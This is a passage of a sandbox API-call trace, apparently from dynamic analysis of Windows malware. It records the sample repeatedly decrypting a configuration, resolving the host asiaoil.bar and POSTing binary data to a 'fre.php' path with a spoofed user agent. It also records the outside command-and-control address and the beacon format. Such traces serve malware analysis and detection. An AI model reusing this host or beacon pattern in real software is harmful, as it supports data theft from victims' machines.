HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0318.966] GetProcessHeap () returned 0x740000 [0318.967] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0318.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe48) returned 0x344 [0318.969] Sleep (dwMilliseconds=0xea60) [0318.971] GetProcessHeap () returned 0x740000 [0318.971] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0318.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0319.006] GetProcessHeap () returned 0x740000 [0319.006] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0319.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.007] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0319.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.009] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.029] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.029] GetProcessHeap () returned 0x740000 [0319.029] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0319.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.031] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0319.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.032] CryptDestroyKey (hKey=0x74d768) returned 1 [0319.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.033] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0319.033] GetProcessHeap () returned 0x740000 [0319.033] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0319.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.034] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.035] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.036] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.037] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.037] GetProcessHeap () returned 0x740000 [0319.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0319.037] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.037] GetProcessHeap () returned 0x740000 [0319.038] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0319.038] GetProcessHeap () returned 0x740000 [0319.038] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0319.038] GetProcessHeap () returned 0x740000 [0319.038] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0319.038] GetProcessHeap () returned 0x740000 [0319.038] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0319.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.039] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0319.050] GetProcessHeap () returned 0x740000 [0319.050] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0319.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.051] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0319.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.052] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.053] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.053] GetProcessHeap () returned 0x740000 [0319.053] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0319.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.054] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0319.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.055] CryptDestroyKey (hKey=0x74d768) returned 1 [0319.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.056] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0319.056] GetProcessHeap () returned 0x740000 [0319.056] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0319.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.057] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0319.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.058] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0319.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.059] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0319.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.060] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0319.060] GetProcessHeap () returned 0x740000 [0319.060] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0319.060] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0319.061] GetProcessHeap () returned 0x740000 [0319.061] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0319.061] socket (af=2, type=1, protocol=6) returned 0x348 [0319.061] connect (s=0x348, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0319.083] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0319.083] GetProcessHeap () returned 0x740000 [0319.083] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0319.083] GetProcessHeap () returned 0x740000 [0319.083] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0319.084] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0319.085] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0319.085] GetProcessHeap () returned 0x740000 [0319.085] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0319.085] GetProcessHeap () returned 0x740000 [0319.085] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0319.085] GetProcessHeap () returned 0x740000 [0319.085] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0319.086] GetProcessHeap () returned 0x740000 [0319.086] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0319.086] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0319.087] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0319.087] GetProcessHeap () returned 0x740000 [0319.087] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0319.087] GetProcessHeap () returned 0x740000 [0319.088] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0319.088] send (s=0x348, buf=0x747928*, len=243, flags=0) returned 243 [0319.090] send (s=0x348, buf=0x761fd0*, len=159, flags=0) returned 159 [0319.090] GetProcessHeap () returned 0x740000 [0319.091] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0319.091] recv (in: s=0x348, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 569 [0319.878] GetProcessHeap () returned 0x740000 [0319.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0319.879] GetProcessHeap () returned 0x740000 [0319.880] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0319.880] GetProcessHeap () returned 0x740000 [0319.880] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0319.880] GetProcessHeap () returned 0x740000 [0319.881] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0319.881] closesocket (s=0x348) returned 0 [0319.881] GetProcessHeap () returned 0x740000 [0319.881] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0319.881] GetProcessHeap () returned 0x740000 [0319.882] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0319.882] GetProcessHeap () returned 0x740000 [0319.882] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0319.883] GetProcessHeap () returned 0x740000 [0319.883] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0319.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x113c) returned 0x348 [0319.892] Sleep (dwMilliseconds=0xea60) [0319.893] GetProcessHeap () returned 0x740000 [0319.893] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0319.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0319.915] GetProcessHeap () returned 0x740000 [0319.915] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0319.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.917] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0319.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.917] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.919] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.919] GetProcessHeap () returned 0x740000 [0319.919] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0319.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.920] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0319.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.921] CryptDestroyKey (hKey=0x74d368) returned 1 [0319.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.922] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0319.922] GetProcessHeap () returned 0x740000 [0319.922] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0319.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.955] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.956] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.957] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.958] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.958] GetProcessHeap () returned 0x740000 [0319.958] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0319.958] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.958] GetProcessHeap () returned 0x740000 [0319.958] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0319.959] GetProcessHeap () returned 0x740000 [0319.959] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0319.959] GetProcessHeap () returned 0x740000 [0319.959] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0319.959] GetProcessHeap () returned 0x740000 [0319.959] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0319.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.960] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.965] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0319.972] GetProcessHeap () returned 0x740000 [0319.972] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0319.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.973] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0319.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.974] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.974] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.974] GetProcessHeap () returned 0x740000 [0319.975] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0319.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.976] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0319.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.977] CryptDestroyKey (hKey=0x74d768) returned 1 [0319.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0319.977] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0319.977] GetProcessHeap () returned 0x740000 [0319.978] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0319.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.980] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0319.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.981] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0319.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.982] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0319.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.983] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0319.983] GetProcessHeap () returned 0x740000 [0319.983] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0319.983] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0319.985] GetProcessHeap () returned 0x740000 [0319.985] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0319.985] socket (af=2, type=1, protocol=6) returned 0x34c [0319.986] connect (s=0x34c, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0320.003] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0320.003] GetProcessHeap () returned 0x740000 [0320.003] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0320.003] GetProcessHeap () returned 0x740000 [0320.003] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0320.004] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.005] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0320.005] GetProcessHeap () returned 0x740000 [0320.005] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0320.005] GetProcessHeap () returned 0x740000 [0320.005] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.006] GetProcessHeap () returned 0x740000 [0320.006] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0320.006] GetProcessHeap () returned 0x740000 [0320.006] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0320.007] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.008] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0320.008] GetProcessHeap () returned 0x740000 [0320.008] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0320.008] GetProcessHeap () returned 0x740000 [0320.008] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.008] send (s=0x34c, buf=0x747928*, len=243, flags=0) returned 243 [0320.009] send (s=0x34c, buf=0x761fd0*, len=159, flags=0) returned 159 [0320.009] GetProcessHeap () returned 0x740000 [0320.009] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0320.009] recv (in: s=0x34c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0320.131] GetProcessHeap () returned 0x740000 [0320.132] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0320.132] GetProcessHeap () returned 0x740000 [0320.132] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0320.132] GetProcessHeap () returned 0x740000 [0320.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0320.133] GetProcessHeap () returned 0x740000 [0320.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0320.133] closesocket (s=0x34c) returned 0 [0320.134] GetProcessHeap () returned 0x740000 [0320.134] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0320.134] GetProcessHeap () returned 0x740000 [0320.134] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0320.134] GetProcessHeap () returned 0x740000 [0320.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0320.135] GetProcessHeap () returned 0x740000 [0320.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0320.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x578) returned 0x34c [0320.137] Sleep (dwMilliseconds=0xea60) [0320.138] GetProcessHeap () returned 0x740000 [0320.138] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) 